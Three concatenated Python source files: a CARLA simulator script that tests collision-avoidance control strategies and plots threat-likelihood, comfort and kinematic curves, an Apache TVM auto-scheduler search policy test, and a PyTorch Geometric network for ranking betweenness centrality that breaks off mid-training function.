import numpy as np
from math import factorial
try:
window_size = np.abs(np.int(window_size))
order = np.abs(np.int(order))
except:
raise ValueError("window_size and order have to be of type int")
if window_size % 2 != 1 or window_size < 1:
raise TypeError("window_size size must be a positive odd number")
if window_size < order + 2:
raise TypeError("window_size is too small for the polynomials order")
order_range = range(order + 1)
half_window = (window_size - 1) // 2
# precompute coefficients
b = np.mat([[k ** i for i in order_range] for k in range(-half_window, half_window + 1)])
m = np.linalg.pinv(b).A[deriv] * rate ** deriv * factorial(deriv)
# pad the signal at the extremes with
# values taken from the signal itself
firstvals = y[0] - np.abs(y[1:half_window + 1][::-1] - y[0])
lastvals = y[-1] + np.abs(y[-half_window - 1:-1][::-1] - y[-1])
y = np.concatenate((firstvals, y, lastvals))
return np.convolve(m[::-1], y, mode='valid')
def plot_threat_curve(thread_record_d, thread_record_a, thread_record_s):
"""visulize some curve"""
title_font_dict = {'family': 'Times New Roman',
'color': 'black',
'weight': 'normal',
'size': 30}
axis_font_dict = {'family': 'Times New Roman',
'color': 'black',
'weight': 'normal',
'size': 30}
legend_font = {'family': 'Times New Roman',
'weight': 'normal',
'size': 30,
}
thread_record_s = np.array(thread_record_s)
thread_record_a = np.array(thread_record_a)
thread_record_d = np.array(thread_record_d)
end = thread_record_s[:, 0][len(thread_record_s[:, 0]) - 1]
step = 4
thread_record_s = thread_record_s[0:int(end):step]
thread_record_a = thread_record_a[0:int(end):step]
thread_record_d = thread_record_d[0:int(end):step]
# plt.plot(thread_record_s[:, 0] / 10., thread_record_s[:, 1], color="green")
# plt.plot(thread_record_a[:, 0] / 10., thread_record_a[:, 1], color="orange")
# plt.plot(thread_record_d[:, 0] / 10., thread_record_d[:, 1], color="red")
# plt.ylim(0, 1.1)
# plt.show()
xnew = np.linspace(0, (end - step - 1) / 10, 200)
func_s = interpolate.interp1d(thread_record_s[:, 0] / 10., thread_record_s[:, 1], kind='slinear')
func_a = interpolate.interp1d(thread_record_a[:, 0] / 10., thread_record_a[:, 1], kind='slinear')
func_d = interpolate.interp1d(thread_record_d[:, 0] / 10., thread_record_d[:, 1], kind='slinear')
ynew_s = func_s(xnew)
ynew_a = func_a(xnew)
ynew_d = func_d(xnew)
# func_s_ = interpolate.interp1d(xnew, ynew_s, kind='cubic')
# func_a_ = interpolate.interp1d(xnew, ynew_a, kind='cubic')
# func_d_ = interpolate.interp1d(xnew, ynew_d, kind='cubic')
#
# xnew = np.arange(0, end/10, 0.01)
# ynew_s = func_s_(xnew)
# ynew_a = func_a_(xnew)
# ynew_d = func_d_(xnew)
# plt.plot(xnew, ynew_s, color="green")
# plt.plot(xnew, ynew_a, color="orange")
# plt.plot(xnew, ynew_d, color="red")
# plt.ylim(0, 1.1)
# plt.show()
ynew_s = savitzky_golay(ynew_s, 21, order=2)
ynew_a = savitzky_golay(ynew_a, 21, order=2)
ynew_d = savitzky_golay(ynew_d, 21, order=2)
plt.figure(figsize=(16, 7))
plt.plot(xnew, np.clip(ynew_s, 0., 1.), color="green", label="Safe", linewidth=2)
plt.fill_between(xnew, 0, np.clip(ynew_s, 0., 1.), alpha=0.2, facecolor='green')
plt.plot(xnew, np.clip(ynew_a, 0., 1.), color="orange", label="Attentive", linewidth=2)
plt.fill_between(xnew, 0, np.clip(ynew_a, 0., 1.), alpha=0.2, facecolor='orange')
plt.plot(xnew, np.clip(ynew_d, 0., 1.), color="red", label="Dangerous", linewidth=2)
plt.fill_between(xnew, 0, np.clip(ynew_d, 0., 1.), alpha=0.2, facecolor='red')
plt.title('Likelihood of Different Threat Degree', fontdict=title_font_dict)
plt.xlabel('Time (s)', fontdict=axis_font_dict)
plt.ylabel('Likelihood', fontdict=axis_font_dict)
plt.tick_params(labelsize=20)
plt.legend(prop=legend_font)
plt.ylim(0., 1.)
left, right = plt.xlim()
plt.xlim(0., right)
plt.show()
def plot_comfort_curve(comfort_level_m, comfort_level_a, comfort_level_c):
"""visulize"""
title_font_dict = {'family': 'Times New Roman',
'color': 'black',
'weight': 'normal',
'size': 30}
axis_font_dict = {'family': 'Times New Roman',
'color': 'black',
'weight': 'normal',
'size': 30}
legend_font = {'family': 'Times New Roman',
'weight': 'normal',
'size': 30,
}
comfort_level_c = np.array(comfort_level_c)
comfort_level_a = np.array(comfort_level_a)
comfort_level_m = np.array(comfort_level_m)
end = comfort_level_c[:, 0][len(comfort_level_c[:, 0]) - 1]
step = 4
comfort_level_c = comfort_level_c[0:int(end):step]
comfort_level_a = comfort_level_a[0:int(end):step]
comfort_level_m = comfort_level_m[0:int(end):step]
# plt.plot(thread_record_s[:, 0] / 10., thread_record_s[:, 1], color="green")
# plt.plot(thread_record_a[:, 0] / 10., thread_record_a[:, 1], color="orange")
# plt.plot(thread_record_d[:, 0] / 10., thread_record_d[:, 1], color="red")
# plt.ylim(0, 1.1)
# plt.show()
xnew = np.linspace(0, (end - step - 1) / 10, 200)
func_s = interpolate.interp1d(comfort_level_c[:, 0] / 10., comfort_level_c[:, 1], kind='slinear')
func_a = interpolate.interp1d(comfort_level_a[:, 0] / 10., comfort_level_a[:, 1], kind='slinear')
func_d = interpolate.interp1d(comfort_level_m[:, 0] / 10., comfort_level_m[:, 1], kind='slinear')
ynew_s = func_s(xnew)
ynew_a = func_a(xnew)
ynew_d = func_d(xnew)
# func_s_ = interpolate.interp1d(xnew, ynew_s, kind='cubic')
# func_a_ = interpolate.interp1d(xnew, ynew_a, kind='cubic')
# func_d_ = interpolate.interp1d(xnew, ynew_d, kind='cubic')
#
# xnew = np.arange(0, end/10, 0.01)
# ynew_s = func_s_(xnew)
# ynew_a = func_a_(xnew)
# ynew_d = func_d_(xnew)
# plt.plot(xnew, ynew_s, color="green")
# plt.plot(xnew, ynew_a, color="orange")
# plt.plot(xnew, ynew_d, color="red")
# plt.ylim(0, 1.1)
# plt.show()
ynew_s = savitzky_golay(ynew_s, 21, order=2)
ynew_a = savitzky_golay(ynew_a, 21, order=2)
ynew_d = savitzky_golay(ynew_d, 21, order=2)
plt.figure(figsize=(16, 7))
plt.plot(xnew, np.clip(ynew_s, 0., 1.), color="green", label="Comfortable", linewidth=2)
plt.fill_between(xnew, 0, np.clip(ynew_s, 0., 1.), alpha=0.2, facecolor='green')
plt.plot(xnew, np.clip(ynew_a, 0., 1.), color="orange", label="Moderate", linewidth=2)
plt.fill_between(xnew, 0, np.clip(ynew_a, 0., 1.), alpha=0.2, facecolor='orange')
plt.plot(xnew, np.clip(ynew_d, 0., 1.), color="red", label="Radical", linewidth=2)
plt.fill_between(xnew, 0, np.clip(ynew_d, 0., 1.), alpha=0.2, facecolor='red')
plt.title('Passenger Comfort Assessment', fontdict=title_font_dict)
plt.xlabel('Time (s)', fontdict=axis_font_dict)
plt.ylabel('Score', fontdict=axis_font_dict)
plt.tick_params(labelsize=20)
plt.legend(prop=legend_font)
plt.ylim(0., 1.)
left, right = plt.xlim()
plt.xlim(0., right)
plt.show()
def plot_vel_acc_rdis(vel, acc, rdis):
title_font_dict = {'family': 'Times New Roman',
'color': 'black',
'weight': 'normal',
'fontsize': 15}
axis_font_dict = {'family': 'Times New Roman',
'color': 'black',
'weight': 'normal',
'fontsize': 30}
legend_font = {'family': 'Times New Roman',
'weight': 'normal',
'size': 10,
}
vel_x = np.array(vel)[:, 0]/10.
vel_y = np.array(vel)[:, 1]
acc_x = np.array(acc)[:, 0]/10.
acc_y = np.array(acc)[:, 1]
rdis_x = np.array(rdis)[:, 0]/10.
rdis_y = np.array(rdis)[:, 1]
fig = plt.figure(figsize=(10, 3.5), dpi=200)
vel_axes = HostAxes(fig, [0.05, 0.1, 0.8, 0.8])
acc_axes = ParasiteAxes(vel_axes, sharex=vel_axes)
rdis_axes = ParasiteAxes(vel_axes, sharex=vel_axes)
vel_axes.parasites.append(acc_axes)
vel_axes.parasites.append(rdis_axes)
vel_axes.set_ylabel('Velocity (m/s)')
vel_axes.set_xlabel('Time (s)')
vel_axes.axis['right'].set_visible(False)
acc_axes.axis['right'].set_visible(True)
acc_axes.set_ylabel('Acceleration (m/s^2)')
acc_axes.axis['right'].major_ticklabels.set_visible(True)
acc_axes.axis['right'].label.set_visible(True)
rdis_axes.set_ylabel('Relative distance (m)')
offset = (60, 0)
new_axisline = rdis_axes._grid_helper.new_fixed_axis
rdis_axes.axis['right2'] = new_axisline(loc='right', axes=rdis_axes, offset=offset)
fig.add_axes(vel_axes)
p1, = vel_axes.plot(vel_x, vel_y, label="Vel", linewidth=2)
p2, = acc_axes.plot(acc_x, acc_y, label="Acc", linewidth=2)
p3, = rdis_axes.plot(rdis_x, rdis_y, label="RD", linewidth=2)
vel_axes.legend(prop=legend_font)
vel_axes.set_ylim(0, np.max(vel_y)+1)
vel_axes.set_xlim(0, np.max(vel_x))
rdis_axes.set_ylim(0, np.max(rdis_y)+1)
# plt.plot(vel_x, vel_y, color="green", label="Velocity", linewidth=2)
# plt.ylabel('Velocity (m/s)', fontdict=axis_font_dict)
#
# plt.plot(acc_x, acc_y, color="orange", label="Acceleration", linewidth=2, secondary_y=True)
# plt.ylabel('Acceleration (m/s^2)', fontdict=axis_font_dict)
#
plt.title('Kinematic information of host vehicle', fontdict=title_font_dict)
# plt.xlabel('Time (s)', fontdict=axis_font_dict)
# plt.ylabel('Likelihood', fontdict=axis_font_dict)
# plt.tick_params(labelsize=20)
plt.legend(prop=legend_font)
# plt.ylim(0., 1.)
# left, right = plt.xlim()
# plt.xlim(0., right)
plt.show()
def control_host(host_vehicle):
""" a controller control the host, if emergency event(Collision) would be happen, it would prevent it."""
def pd_control_for_collision(velocity, distance_collision_host, last_error):
"""a simple PD controller of host vehicle for coliision purpose"""
k_p = 1
k_d = 0.5
other = get_other(world)
other_pos = other.get_location()
distance_collision = other_pos.distance(carla.Location(x=-77.5, y=-3., z=pos.z))
o_velocity = other.get_velocity()
o_v = math.sqrt(o_velocity.x**2+o_velocity.y**2)
ttc = distance_collision/(o_v+1e-10)
target_v = distance_collision_host/(ttc+1e-10)
error = target_v - math.sqrt(velocity.x**2+velocity.y**2)
d_error = error - last_error
throttle = k_p*error + k_d*d_error
return max(min(throttle, 1.), 0.), error
def pd_control_for_safety(degree_likelihood, target_likelihood, last_error, kp, kd):
"""aa
Return:
if val > 0, brake,
else, throttle
"""
# k_p = 4
# k_d = 2.5
k_p = kp
k_d = kd
error = target_likelihood - degree_likelihood
d_error = error - last_error
val = k_p*error + k_d*d_error
return max(min(val, 1.), -1.), error
last_error_pdcc = 0.
last_error_pdcs = 0.
time_step = 0
emergency_control = False
pd_control = True
thread_record_d = []
thread_record_a = []
thread_record_s = []
comfort_record_m = []
comfort_record_a = []
comfort_record_c = []
vel_record = []
acc_record = []
relative_distance_record = []
other = get_other(world)
record_start_step = 50
while True:
## record info
pos = host_vehicle.get_location()
velocity = host_vehicle.get_velocity()
velocity_ = math.sqrt(velocity.x**2 + velocity.y**2)
# vel_record.append([time_step, velocity_])
acc = host_vehicle.get_acceleration()
# acc_record.append([time_step, -acc.x])
if time_step >= record_start_step:
vel_record.append([time_step - record_start_step, velocity_])
acc_record.append([time_step - record_start_step, -acc.x])
comfort_scores = comfort_level_scores(-acc.x)
if time_step >= record_start_step:
comfort_record_m.append([time_step - record_start_step, comfort_scores[0]])
comfort_record_a.append([time_step - record_start_step, comfort_scores[1]])
comfort_record_c.append([time_step - record_start_step, comfort_scores[2]])
other_pos = other.get_location()
other_velocity = other.get_velocity()
if time_step >= record_start_step:
relative_distance_record.append([time_step - record_start_step, pos.distance(other_pos)])
# logger.info('host_vehicle velocity:' + str(velocity) + ' acc:' + str(acc))
distance_collision = pos.distance(carla.Location(x=-77.5, y=-3., z=pos.z))
# logger.info('remaining distance:' + str(distance_collision))
## assess the situation
ego_v_state = ego_v.ego_vehicle()
ego_v_state.set_position(position=(pos.x, pos.y, pos.z))
ego_v_state.set_linear(linear=(velocity.x, velocity.y, velocity.z))
ego_v_state.set_size(size=(1.6, 1.6, 3.2))
road_obj_state = road_o.road_obj()
road_obj_state.set_position(position=(other_pos.x, other_pos.y, other_pos.z))
road_obj_state.set_linear(linear=(other_velocity.x, other_velocity.y, other_velocity.z))
road_obj_state.set_size(size=(1.6, 1.6, 3.2))
score = _assess_one_obj_threat_score(ego_v_state, road_obj_state)
degree = _score_2_threat_degree(score)
if time_step >= record_start_step:
thread_record_d.append([time_step - record_start_step, score[0]])
thread_record_a.append([time_step - record_start_step, score[1]])
thread_record_s.append([time_step - record_start_step, score[2]])
if pd_control:
throttle, last_error_pdcc = pd_control_for_collision(velocity, distance_collision, last_error_pdcc)
control = carla.VehicleControl(throttle=throttle)
host_vehicle.apply_control(control)
if emergency_control:
# ## strategy-1 : emergency braking
if strategy_type == STRATEGY.AGGRESSIVE:
if degree == safety_degree.dangerous and score[0] >= 0.8:
# print('brake!!')
control = carla.VehicleControl(brake=1.)
host_vehicle.apply_control(control)
elif degree == safety_degree.safe and score[2] >= 0.8:
control = carla.VehicleControl(throttle=1.)
host_vehicle.apply_control(control)
else:
control = carla.VehicleControl(brake=1.)
host_vehicle.apply_control(control)
## strategy-1 : emergency braking
## strategy-2 : pd control
elif strategy_type == STRATEGY.CONSERVATIVE:
val, last_error_pdcs = pd_control_for_safety(score[2], 0.8, last_error_pdcs, kp=0.1, kd=0.1)
if val >= 0:
control = carla.VehicleControl(brake=val)
else:
control = carla.VehicleControl(throttle=min(1., math.fabs(val)+0.5))
## strategy-3 : pd control
elif strategy_type == STRATEGY.NORMAL:
val, last_error_pdcs = pd_control_for_safety(score[1], 0.5, last_error_pdcs, kp=2, kd=0.5)
if val <= 0:
control = carla.VehicleControl(brake=math.fabs(val))
else:
control = carla.VehicleControl(throttle=val)
else:
raise ValueError('strategy_type wrong...')
host_vehicle.apply_control(control)
if pos.x < -85:
logger.info('Stop test...')
break
## transform the control state
## for strategy-1
if strategy_type == STRATEGY.AGGRESSIVE:
if collision_avoidance and degree == safety_degree.dangerous and score[0] >= 0.8:
pd_control = False
emergency_control = True
## for strategy-2
elif strategy_type == STRATEGY.CONSERVATIVE:
if collision_avoidance and degree == safety_degree.safe and score[2] <= 0.8:
pd_control = False
emergency_control = True
## for strategy-3
elif strategy_type == STRATEGY.NORMAL:
if collision_avoidance and degree == safety_degree.attentive and score[1] >= 0.5:
pd_control = False
emergency_control = True
#
#
# # logger.info('threat degree for other vehicle:'+str(degree))
# ## assess the situation
#
# ## control
# if collision_avoidance:
# if not emergency_control:
# throttle, last_error = pd_control_for_collision(velocity, distance_collision, last_error)
# control = carla.VehicleControl(throttle=throttle)
# else:
# control = carla.VehicleControl(brake=1.)
# if velocity_ < 0.01:
# logger.info('Stop testing...')
# i = 0
# while (i<20):
# thread_record_d.append([time_step, 0])
# thread_record_a.append([time_step, 0])
# thread_record_s.append([time_step, 1])
#
# comfort_record_m.append([time_step, 0])
# comfort_record_a.append([time_step, 0])
# comfort_record_c.append([time_step, 1])
#
# vel_record.append([time_step, velocity_])
# acc_record.append([time_step, -acc.x])
#
# pos = get_host(world).get_location()
# other_pos = get_other(world).get_location()
# relative_distance_record.append([time_step, pos.distance(other_pos)])
#
# time_step += 1
# i += 1
# time.sleep(0.1)
# break
# else:
# throttle, last_error = pd_control_for_collision(velocity, distance_collision, last_error)
# control = carla.VehicleControl(throttle=throttle)
# host_vehicle.apply_control(control)
# if distance_collision > 10:
# control = carla.VehicleControl(throttle=1.)
# host_vehicle.apply_control(control)
# else:
# control = carla.VehicleControl(brake=1.)
# host_vehicle.apply_control(control)
time.sleep(0.05)
time_step += 1
# thread_record_d = thread_record_d[len(thread_record_d)//5:]
# thread_record_a = thread_record_a[len(thread_record_a) // 5:]
# thread_record_s = thread_record_s[len(thread_record_s) // 5:]
#
# vel_record = vel_record[len(vel_record) // 5:]
# acc_record = acc_record[len(acc_record) // 5:]
# relative_distance_record = relative_distance_record[len(relative_distance_record) // 5:]
#
# comfort_record_m = comfort_record_m[len(comfort_record_m) // 5:]
# comfort_record_a = comfort_record_a[len(comfort_record_a) // 5:]
# comfort_record_c = comfort_record_m[len(comfort_record_m) // 5:]
plot_threat_curve(thread_record_d, thread_record_a, thread_record_s)
plot_vel_acc_rdis(vel_record, acc_record, relative_distance_record)
plot_comfort_curve(comfort_record_m, comfort_record_a, comfort_record_c)
if save_experiment_data:
save_dict = {'experiment_name': experiment_name,
'thread_record_d': thread_record_d,
'thread_record_a': thread_record_a,
'thread_record_s': thread_record_s,
'vel_record': vel_record,
'acc_record': acc_record,
'relative_distance_record': relative_distance_record,
'comfort_record_m': comfort_record_m,
'comfort_record_a': comfort_record_a,
'comfort_record_c': comfort_record_c}
with open(save_experiment_data_to, 'wb') as f:
pickle.dump(save_dict, f)
logger.info('save success... file - %s'%(save_experiment_data_to))
def control_other(other_vehicle):
while True:
# ## record info
# velocity = other_vehicle.get_velocity()
# acc = other_vehicle.get_acceleration()
# logger.info('other_vehicle velocity:' + str(velocity) + ' acc:' + str(acc))
# pos = other_vehicle.get_location()
# distance_collision = pos.distance(carla.Location(x=-77.5, y=-3., z=pos.z))
# logger.info('remaining distance:' + str(distance_collision))
throttle = random.uniform(other_vehicle_speed_range[0], other_vehicle_speed_range[1])
control = carla.VehicleControl(throttle=throttle)
other_vehicle.apply_control(control)
time.sleep(0.1)
if __name__ == '__main__':
##############################
####### general config #######
other_vehicle_init_pos = random.randint(40, 50)
other_vehicle_speed_range = (random.uniform(0.4, 0.5), random.uniform(0.6, 0.7))
##############################
#### carla world init ####
client = carla.Client('127.0.0.1', 2000)
client.set_timeout(10.0) # seconds
logger.info('Carla connect success...')
logger.info('Carla world initing...')
world = client.get_world()
destroy_all_actors(world)
## vehicle blueprint
blueprints = world.get_blueprint_library().filter('vehicle.nissan.micra')
blueprints = [x for x in blueprints if int(x.get_attribute('number_of_wheels')) == 4]
## host vehicle settings
host_vehicle_bp = random.choice(blueprints)
if host_vehicle_bp.has_attribute('color'):
color = random.choice(host_vehicle_bp.get_attribute('color').recommended_values)
host_vehicle_bp.set_attribute('color', color)
host_vehicle_bp.set_attribute('role_name', 'host_vehicle')
transform = carla.Transform(carla.Location(x=-39.0, y=-3., z=1.8), carla.Rotation(pitch=0., yaw=180., roll=0.))
try_spawn_at(world, host_vehicle_bp, transform, autopilot=False)
## other vehicle settings
other_vehicle_bp = random.choice(blueprints)
if other_vehicle_bp.has_attribute('color'):
color = random.choice(other_vehicle_bp.get_attribute('color').recommended_values)
other_vehicle_bp.set_attribute('color', color)
other_vehicle_bp.set_attribute('role_name', 'other_vehicle')
transform = carla.Transform(carla.Location(x=-77.75, y=float(other_vehicle_init_pos), z=1.8),
carla.Rotation(pitch=0., yaw=-90., roll=0.))
try_spawn_at(world, other_vehicle_bp, transform, autopilot=False)
time.sleep(1) ## waiting carla synchronous
logger.info('host vehicle location: '+str(get_host(world).get_location()))
logger.info('other vehicle location: '+str(get_other(world).get_location()))
logger.info('other vehicle throttle range: '+str(other_vehicle_speed_range))
logger.info('The test will start in 1 seconds, notice the Carla screen!!')
time.sleep(1)
logger.info('Start testing...')
control_host_t = threading.Thread(target=control_host, args=(get_host(world),))
control_other_t = threading.Thread(target=control_other, args=(get_other(world),))
control_host_t.start()
control_other_t.start()
while True:
pass
|
test_auto_scheduler_search_policy.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Test search policy"""
import random
import numpy as np
import tempfile
import tvm
from tvm import auto_scheduler
from test_auto_scheduler_common import matmul_auto_scheduler_test, PropagatingThread
def search_common(workload=matmul_auto_scheduler_test, target="llvm",
search_policy='empty', seed=random.randint(1, 1 << 30), runner='local',
cost_model=auto_scheduler.RandomModel(), num_measure_trials=2,
init_search_callbacks=None):
print("Test %s schedule search with the default search policy" % (target))
random.seed(seed)
N = 128
workload_key = auto_scheduler.make_workload_key(workload, (N, N, N))
dag = auto_scheduler.ComputeDAG(workload_key)
target = tvm.target.create(target)
task = auto_scheduler.SearchTask(dag, workload_key, target)
with tempfile.NamedTemporaryFile() as fp:
log_file = fp.name
init_search_callbacks = init_search_callbacks or []
init_search_callbacks.append(auto_scheduler.PreloadMeasuredStates(log_file))
if search_policy == 'empty':
search_policy = auto_scheduler.EmptyPolicy(task)
elif search_policy == 'sketch':
search_policy = auto_scheduler.SketchPolicy(task,
init_search_callbacks=init_search_callbacks)
tuning_options = auto_scheduler.TuningOptions(num_measure_trials=num_measure_trials,
runner=runner, verbose=1, measure_callbacks=[auto_scheduler.RecordToFile(log_file)])
sch, args = auto_scheduler.auto_schedule(task, search_policy, tuning_options)
inp, res = auto_scheduler.load_best(log_file, workload_key, target)
print("==== Python Code ====")
print(dag.print_python_code_from_state(inp.state))
try:
print("==== Lowered Stmt ====")
print(tvm.lower(sch, args, simple_mode=True))
mod = tvm.build(sch, args, target)
ctx = tvm.context(str(target), 0)
dtype = dag.tensors[0].dtype
a = tvm.nd.array(np.random.uniform(size=(N, N)).astype(dtype), ctx)
b = tvm.nd.array(np.random.uniform(size=(N, N)).astype(dtype), ctx)
c = tvm.nd.array(np.zeros((N, N), dtype=dtype), ctx)
mod(a, b, c)
tvm.testing.assert_allclose(c.asnumpy(), np.dot(
a.asnumpy(), b.asnumpy()), rtol=1e-5)
print("==== Verification passed ====")
except Exception:
raise Exception("Error encountered with seed: %d" % (seed))
print()
def test_workload_registry_search_basic():
if not tvm.runtime.enabled("llvm"):
return
# wrap the search in a new thread to avoid the conflict
# between python's multiprocessing and tvm's thread pool
t = PropagatingThread(target=search_common, kwargs={'seed': 944563397})
t.start()
t.join()
t = PropagatingThread(target=search_common,
kwargs={'seed': 944563397, 'workload': "matmul_auto_scheduler_test"})
t.start()
t.join()
t = PropagatingThread(target=search_common,
kwargs={'seed': 944563397, 'workload': "matmul_auto_scheduler_test_rename_1"})
t.start()
t.join()
def test_sketch_search_policy_basic():
if not tvm.runtime.enabled("llvm"):
return
# wrap the search in a new thread to avoid the conflict
# between python's multiprocessing and tvm's thread pool
t = PropagatingThread(target=search_common,
kwargs={'seed': 944563397, 'search_policy': 'sketch'})
t.start()
t.join()
def test_sketch_search_policy_cuda_rpc_runner():
if not tvm.runtime.enabled("cuda"):
return
measure_ctx = auto_scheduler.LocalRPCMeasureContext()
# wrap the search in a new thread to avoid the conflict
# between python's multiprocessing and tvm's thread pool
t = PropagatingThread(target=search_common,
kwargs={'seed': 944563397, 'search_policy': 'sketch', 'target': 'cuda',
'runner': measure_ctx.runner})
t.start()
t.join()
if __name__ == "__main__":
test_workload_registry_search_basic()
test_sketch_search_policy_basic()
test_sketch_search_policy_cuda_rpc_runner()
|
qweNet.py | import sys
import time
import networkx as nx
import numpy as np
import torch
import torch.nn.functional as F
from scipy.stats import kendalltau as kd
from tensorboardX import SummaryWriter
from torch import nn
from torch_geometric.data import DataLoader
from torch_geometric.nn import GCNConv
from torch_geometric.utils import from_networkx
from tqdm import tqdm
import multiprocessing
from data_util.data_utils import betweenness_centrality_parallel as pbc
from data_util.data_utils import ranktopk
from data_util.generate_bc_feature import generate_bc_feature
import pickle
EMBEDDING_SIZE = 128
REG_HIDDEN = (int)(EMBEDDING_SIZE / 2)
MIN_SIZE = 100
MAX_SIZE = 200
MAX_EPOCH = 10000
N_VALID = 100 # number of validation graphs
N_TRAIN = 1000
BATCH_SIZE = 32
LEARNING_RATE = 0.0001
max_bp_iter = 4 # neighbor propagation steps
writer = SummaryWriter('./../result')
num_percheck = 200
node_feat_dim = 3 # initial node features, [Dc,1,1]
aux_feat_dim = 2 # extra node features in the hidden layer in the decoder, [Dc,CI1,CI2,1]
initialization_stddev = 0.01
combineID = 1 # how to combine self embedding and neighbor embedding,
# 0:structure2vec(add node feature and neighbor embedding)
#1:graphsage(concatenation); 2:gru
class decoder(nn.Module):
def __init__(self, decoder_maxBpIter, decoder_nodeFeatDim, decoder_embeddingSize, inTraining=True):
super(decoder, self).__init__()
self.maxBpIter = decoder_maxBpIter
self.inputLayer = nn.Sequential(nn.Linear(decoder_nodeFeatDim, decoder_embeddingSize), nn.LeakyReLU(
inTraining == False), nn.BatchNorm1d(decoder_embeddingSize))
#In forward repeat three layers
self.nodeConv = GCNConv(decoder_embeddingSize, decoder_embeddingSize)
self.combine = nn.GRUCell(decoder_embeddingSize, decoder_embeddingSize)
self.outThisCycle = nn.BatchNorm1d(decoder_embeddingSize)
self.outputLayer = nn.BatchNorm1d(decoder_embeddingSize)
def forward(self, x, edge_Index):
x = self.inputLayer(x)
max_x = x
for i in range(0, self.maxBpIter):
pre_x = x
x = self.nodeConv(x, edge_Index)
x = self.combine(pre_x, x)
x = self.outThisCycle(x)
max_x = torch.max(torch.stack((max_x, x), dim = 0), 0)[0]
x = max_x
x = self.outputLayer(x)
return x
# two layer MLP, the first hidden layer, I add a Batchnorm to accelerated the training rate.
class encoder(nn.Module):
def __init__(self, encoder_inDim, encoder_numHidden1, encoder_outDim, encoder_auxFeatDim, encoderHaveBatch=True, inTraining=True):
super(encoder, self).__init__()
self.auxFeatDim = encoder_auxFeatDim
if encoderHaveBatch == True:
self.hidden1 = nn.Sequential(nn.Linear(encoder_inDim, encoder_numHidden1), nn.BatchNorm1d(
encoder_numHidden1), nn.LeakyReLU(inTraining == False))
else:
self.hidden1 = nn.Sequential(nn.Linear(
encoder_inDim, encoder_numHidden1), nn.LeakyReLU(inTraining == False))
self.out = nn.Sequential(
nn.Linear(encoder_numHidden1 + encoder_auxFeatDim, encoder_outDim))
def forward(self, x, aux_feat):
x = self.hidden1(x)
if self.auxFeatDim != 0:
x = torch.cat((x, aux_feat), 1)
x = self.out(x)
return x
class QweNet(nn.Module):
def __init__(self, decoder_maxBpIter, decoder_nodeFeatDim, decoder_embeddingSize, encoder_inDim, encoder_numHidden1, encoder_outDim, encoder_auxFeatDim, encoderHaveBatch=True, inTraining=True):
super(QweNet, self).__init__()
self.decoder = decoder(
decoder_maxBpIter, decoder_nodeFeatDim, decoder_embeddingSize, inTraining)
self.encoder = encoder(encoder_inDim, encoder_numHidden1,
encoder_outDim, encoder_auxFeatDim, encoderHaveBatch, inTraining)
def forward(self, data):
x, edgeIndex = data.x, data.edge_index
aux_feat = [] # add aux_feat's define
x = self.decoder(x, edgeIndex)
xlen = x.size()[0]
aux_feat = torch.empty(xlen).cuda()
x = self.encoder(x, aux_feat)
return x
class QweTool:
def __init__(self):
self.trainSet = [] # pyg data
self.testSet = []
self.device = torch.device(
'cuda' if torch.cuda.is_available() else 'cpu')
def build_model(self, input_dim):
return QweNet(node_features_dim=input_dim)
def clearTrainset(self):
self.trainSet.clear()
self.num_train = 0
def clearTestset(self):
self.testSet.clear()
self.num_test = 0
def gen_graph(self, min_size, max_size, graph_type):
graph_size = (int)(np.random.randint(min_size, max_size, 1))
gen_graphs = [lambda graph_size: nx.erdos_renyi_graph(n=graph_size, p=0.15),
lambda graph_size: nx.connected_watts_strogatz_graph(
n=graph_size, k=8, p=0.1),
lambda graph_size: nx.barabasi_albert_graph(
n=graph_size, m=4),
lambda graph_size: nx.powerlaw_cluster_graph(
n=graph_size, m=4, p=0.05)
]
return gen_graphs[graph_type](graph_size)
def insert_data(self, g, isTrain=True, label=None):
graph_data = from_networkx(g)
btres = {}
if label is None:
if g.order() > 1000:
pbc(g, btres=btres)
else:
btres = nx.betweenness_centrality(g)
label = [btres[node] for node in g.nodes]
graph_data.y = torch.tensor(label, dtype=torch.float32)
feature, _ = generate_bc_feature(g, sampler=2)
bc_feature = np.array([feature[node]
for node in g.nodes]).reshape((g.order(), 1))
aux_feature = np.ones((g.order(), 2))
node_feature = np.concatenate([bc_feature, aux_feature], axis=1)
graph_data.x = torch.from_numpy(node_feature).type(torch.float32)
if isTrain:
self.trainSet.append(graph_data)
self.num_train += 1
else:
self.testSet.append(graph_data)
self.num_test += 1
def prepareValidData(self, n_data, min_size, max_size, types):
print('\ngenerating validation graphs...')
sys.stdout.flush()
self.clearTestset()
assert (len(types) == n_data or len(types) == 1)
for i in tqdm(range(n_data)):
graph_type = types[0] if len(types) == 1 else types[i]
g = self.gen_graph(min_size, max_size, graph_type)
self.insert_data(g, isTrain=False)
def gen_new_graph(self, min_size, max_size, types, num_graph=1000):
print('\ngenerating new training graphs...')
self.clearTrainset()
assert (len(types) == num_graph or len(types) == 1)
p_list = []
for i in tqdm(range(num_graph)):
graph_type = types[0] if len(types) == 1 else types[i]
g = self.gen_graph(min_size, max_size, graph_type)
"""
p = multiprocessing.Process(target = self.insert_data, args=(g, True, ))
p.start()
p_list.append(p)
"""
self.insert_data(g, isTrain=True)
def pairwise_ranking_loss(self, preds, labels, seed=42):
np.random.seed(seed)
assert len(preds) == len(labels)
id_src = np.random.permutation(len(preds))
id_des = np.random.permutation(len(preds))
# y = np.ones((len(pred,)))
# y[labels[id_src] - labels[id_des] < 0] = -1
# loss = F.margin_ranking_loss(pred[id_src], pred[id_des], y)
pred_res = preds[id_src] - preds[id_des]
label_res = labels[id_src] - labels[id_des]
lossL = nn.BCEWithLogitsLoss(size_average=False)
label_res = label_res.view(pred_res.size())
loss = lossL(pred_res, torch.sigmoid(label_res))
return torch.mean(loss)
def train(self, model, optimizer, criterion, max_epoch):
flag = True
model = model.to(self.device)
types = [0]
self.prepareValidData(N_VALID, min_size=MIN_SIZE,
max_size=MAX_SIZE, types=types)
self.gen_new_graph(MIN_SIZE, MAX_SIZE, types, num_graph=N_TRAIN)
